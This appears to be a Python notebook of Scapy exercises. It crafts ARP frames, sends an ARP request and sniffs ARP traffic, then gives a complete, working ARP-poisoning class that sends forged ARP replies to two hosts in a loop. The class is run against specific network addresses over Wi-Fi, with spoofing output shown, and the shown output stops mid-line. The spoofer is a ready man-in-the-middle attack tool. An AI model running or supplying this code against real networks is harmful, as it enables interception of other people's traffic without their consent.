In [1]:
from scapy.all import *

# Creating frames, packets

In [2]:
#============= creating ================

# create an ethenret frame
eth_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src="00:11:22:33:44:55", type=0x0806) # Version 2

# create an arp request
arp_request = ARP(pdst='192.168.1.2', psrc='192.145.1.5', op=1) # op=1 for ARP request , op= 2 for an ARP response.

print(f"Ethernet frame: {eth_frame.show()}")
print(f"ARP frame: {arp_request.show()}")

###[ Ethernet ]### 
  dst       = ff:ff:ff:ff:ff:ff
  src       = 00:11:22:33:44:55
  type      = ARP

Ethernet frame: None
###[ ARP ]### 
  hwtype    = Ethernet (10Mb)
  ptype     = IPv4
  hwlen     = None
  plen      = None
  op        = who-has
  hwsrc     = 48:e7:da:a2:25:f1
  psrc      = 192.145.1.5
  hwdst     = 00:00:00:00:00:00
  pdst      = 192.168.1.2

ARP frame: None


In [6]:
# creat an Ethernet frame with an ARP request
eth_arp_packet = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst='10.240.82.19')
response = srp1(eth_arp_packet, timeout=2, verbose=False) # send the packet and wait for a response, captures a single response for the packet sent.

if response:
    print("Received reponse:")
    response.show()
else:
    print("No response received.")

Received reponse:
###[ Ethernet ]### 
  dst       = 48:e7:da:a2:25:f1
  src       = 8a:7d:b0:62:db:ba
  type      = ARP
###[ ARP ]### 
     hwtype    = Ethernet (10Mb)
     ptype     = IPv4
     hwlen     = 6
     plen      = 4
     op        = is-at
     hwsrc     = 8a:7d:b0:62:db:ba
     psrc      = 10.240.82.19
     hwdst     = 48:e7:da:a2:25:f1
     pdst      = 10.167.198.193



# Sniffing

In [7]:
#================= sniffing ===============
print("Listening for ARP packets...")
sniff(filter="arp", count=5, prn=lambda pkt: pkt.summary()) # The prn function is used to define an action (here, to display a summary of the packet).


Listening for ARP packets...
Ether / ARP who has 10.167.198.193 says 10.167.198.218
Ether / ARP is at 48:e7:da:a2:25:f1 says 10.167.198.193
Ether / ARP who has 10.167.198.193 says 10.167.198.218
Ether / ARP is at 48:e7:da:a2:25:f1 says 10.167.198.193
Ether / ARP who has 10.167.198.193 says 10.167.198.218


<Sniffed: TCP:0 UDP:0 ICMP:0 Other:5>

# ARP POSIONING (SPOOF)

In [ ]:
from colorama import Fore
import time

class ArpSpoofer:
    def __init__(self, target_ip, spoof_ip, interface):
        self.target_ip = target_ip
        self.spoof_ip = spoof_ip
        self.interface = interface
        self.attacker_mac = get_if_hwaddr(interface)

    def get_mac(self, ip):
        request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip)
        answered, _ = srp(request, iface=self.interface, timeout=2, verbose=False)

        if answered:
            return answered[0][1].hwsrc
        else:
            print(Fore.RED + f"[!] No response from {ip}. Cannot get MAC.")
            return None

    def spoof(self, target, spoofed):
        target_mac = self.get_mac(target)
        if target_mac is None:
            return
        
        packet = ARP(
            op=2,
            pdst=target,
            hwdst=target_mac,
            psrc=spoofed,
            hwsrc=self.attacker_mac 
        )
        send(packet, iface=self.interface, verbose=False)
        print(Fore.YELLOW + f"[+] Spoofing {target} pretending to be {spoofed}")

    def restore(self, dest_ip, source_ip):
        dest_mac = self.get_mac(dest_ip)
        source_mac = self.get_mac(source_ip)
        if dest_mac is None or source_mac is None:
            return
        
        packet = ARP(
            op=2,
            pdst=dest_ip,
            hwdst=dest_mac,
            psrc=source_ip,
            hwsrc=source_mac
        )
        send(packet, iface=self.interface, count=5, verbose=False)
        print(Fore.GREEN + f"[+] Restored ARP table for {dest_ip}")

    def run(self):
        try:
            while True:
                self.spoof(self.target_ip, self.spoof_ip)
                self.spoof(self.spoof_ip, self.target_ip)
                time.sleep(2)
        except KeyboardInterrupt:
            print(Fore.RED + "[!] CTRL+C detected. Restoring ARP tables...")
            self.restore(self.target_ip, self.spoof_ip)
            self.restore(self.spoof_ip, self.target_ip)
            print(Fore.GREEN + "[+] ARP tables restored.")

In [ ]:
spoofer = ArpSpoofer(target_ip="10.240.82.19", spoof_ip="10.167.198.218", interface="Wi-Fi")
spoofer.run()

[+] Spoofing 10.240.82.19 pretending to be 10.167.198.218
[+] Spoofing 10.167.198.218 pretending to be 10.240.82.19
[+] Spoofing 10.240.82.19 pretending to be 10.167.198.218
[+] Spoofing 10.167.198.218 pretending to be 10.240.82.19
[+] Spoofing 10.240.82.19 pretending to be 10.167.198.218
[+] Spoofing 10.167.198.218 pretending to be 10.240.82.19
[+] Spoofing 10.240.82.19 pretending to be 10.167.198.218
[+] Spoofing 10.167.198.218 pretending to be 10.240.82.19
[+] Spoofing 10.240.82.19 pretending to be 10.167.198.218
[+] Spoofing 10.167.198.218 pretending to be 10.240.82.19
[+] Spoofing 10.240.82.19 pretending to be 10.167.198.218
[+] Spoofing 10.167.198.218 pretending to be 10.240.82.19
[!] No response from 10.240.82.19. Cannot get MAC.
[+] Spoofing 10.167.198.218 pretending to be 10.240.82.19
[+] Spoofing 10.240.82.19 pretending to be 10.167.198.218
[+] Spoofing 10.167.198.218 pretending to be 10.240.82.19
[+] Spoofing 10.240.82.19 pretending to be 10.167.198.218
[+] Spoofing 10.167.1